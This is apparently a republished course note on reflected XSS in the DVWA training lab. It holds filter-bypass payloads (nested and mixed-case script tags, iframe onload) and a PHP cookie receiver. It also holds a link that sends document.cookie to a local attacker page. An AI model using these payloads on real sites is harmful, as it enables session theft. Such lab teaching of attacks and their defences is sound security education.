"Notes" NetEase micro-professional-web security Engineer -04.web Security Combat -9.XSS

Source: Internet
Author: User

XSS (cross-site scripting), which we mentioned earlier, is an attack in which an attacker submits malicious HTML code to a website that has an XSS vulnerability; that code then runs automatically in the browsers of other users who view the site, achieving the attacker's goal, for example stealing user cookies, defacing the page structure, or redirecting to other websites. In principle, any place where input data is reflected without being processed is an XSS vulnerability.

The following is an approximate flow of reflected XSS:

We will go through this process in the hands-on exercise.

DVWA hands-on:

1. Open PhpStudy or XAMPP and start Apache and MySQL;

2. Open the DVWA main page in the browser, select DVWA Security in the left column and set the level to low, then go to XSS (Reflected).

When we enter the name Kplayer, the page returns the welcome message Hello Kplayer. If instead we enter a JS script:

<script>alert(/xss/)</script>

A popup appears, which confirms an XSS vulnerability. But some will say: would anyone really be so silly as to type a script into the input box themselves? Of course not! Instead, the attacker sends a link to the victim:

http://localhost/DVWA-1.9/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E#

When the victim clicks it, the popup appears in the victim's browser. Wait, this operation looks a bit familiar; we saw the same pattern in the CSRF section. What is the difference?

CSRF (cross-site request forgery) uses the victim's cookie or session to impersonate the user and send a request to the server that completes the attack (such as a money transfer); it works because the server trusts the user's identity too much.

Reflected XSS works because the user trusts the current link or website too much. A JS script is injected into the link or page, and once it is allowed to execute it does not just pop up a prank window: it can read the user's cookies and then carry out malicious operations with them.

For example, the attacker writes a cookie.php file with the following content:

<?php $cookie = $_GET['cookie']; file_put_contents('cookie.txt', $cookie); ?>

places it in the attacker's server directory, and sends the victim a malicious link:

http://localhost/DVWA-1.9/vulnerabilities/xss_r/?name=<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>#

It needs to be URL-encoded with HackBar:

http://localhost/DVWA-1.9/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3fcookie%3d%27%2bdocument.cookie%3b</script>#

Then we see that cookie.txt on the attacker's server has received the user's cookie.

3. Next we look at the medium level of reflected XSS. The method above no longer works; looking at the server-side source, we find that the keyword is filtered, essentially a blacklist mechanism:

    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

After the earlier exercises we are no longer afraid of a blacklist; on the contrary, a blacklist means there may be a way around it, for example nested notation such as <scr<script>ipt> or mixed case such as <Script>. We will not dwell on it.

4. Let's look at the high level of reflected XSS. It is also blacklist-based filtering, this time resisting the nested-notation and case-mixing bypasses:

    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

This blocks our use of the script tag, but as long as it is a blacklist there can be gaps, and we can use other tags such as img and iframe:

<iframe onload=alert(1);>

5. Finally we look at the impossible level of reflected XSS. It uses the htmlspecialchars function to convert the predefined characters &, ", ', < and > into HTML entities, so the browser does not treat them as HTML elements; this is an effective defense against reflected XSS.

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );
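As an added illustration (not code from the original notes or from DVWA), the following Python models the three server-side filters quoted in steps 3 to 5 and runs this section's inputs through each, so the difference between blacklist removal and output encoding is visible in the result. The function names and test inputs are my own, and the medium/high filters are assumed to mirror DVWA's str_replace and preg_replace lines.

```python
import html
import re

# Assumed Python equivalents of the three DVWA reflected-XSS filters shown above.

def filter_medium(name: str) -> str:
    # single-pass removal of the literal tag, like str_replace('<script>', '', ...)
    return name.replace("<script>", "")

def filter_high(name: str) -> str:
    # case-insensitive regex stripping anything that spells s.c.r.i.p.t after '<',
    # like preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', ...)
    return re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", name, flags=re.IGNORECASE)

def filter_impossible(name: str) -> str:
    # output encoding, like htmlspecialchars(): & < > " ' become entities
    return html.escape(name, quote=True)

def is_still_markup(output: str) -> bool:
    # crude check: does the reflected string still contain a raw opening tag?
    return re.search(r"<[a-zA-Z]", output) is not None

def run_cases() -> dict:
    # constructed inputs taken from the exercise in this section
    cases = {
        "plain": "<script>alert(/xss/)</script>",
        "nested": "<scr<script>ipt>alert(/xss/)</script>",
        "mixedcase": "<ScRiPt>alert(/xss/)</ScRiPt>",
        "iframe": "<iframe onload=alert(1);>",
    }
    results = {}
    for label, payload in cases.items():
        results[label] = {
            "medium": filter_medium(payload),
            "high": filter_high(payload),
            "impossible": filter_impossible(payload),
        }
    return results

if __name__ == "__main__":
    for label, outs in run_cases().items():
        for level, out in outs.items():
            flag = "STILL MARKUP" if is_still_markup(out) else "neutralised"
            print(f"{label:9s} {level:10s} {flag:12s} {out}")
```

Note that the medium filter turns the nested input back into a clean <script> tag, the high filter leaves the iframe untouched, and only the encoding filter neutralises every case.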

6. DVWA also has a stored XSS exercise; it is similar in practice to reflected XSS and is not repeated here. Interested readers can try the experiment themselves.

Practical experience:

XSS (cross-site scripting) is a script injection attack that lets an attacker execute malicious script in another user's browser. Effective protection is to filter input and encode output properly, for example HTML encoding and JS escaping.

"Notes" NetEase micro-professional-web security Engineer -04.web Security Combat -9.XSS

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.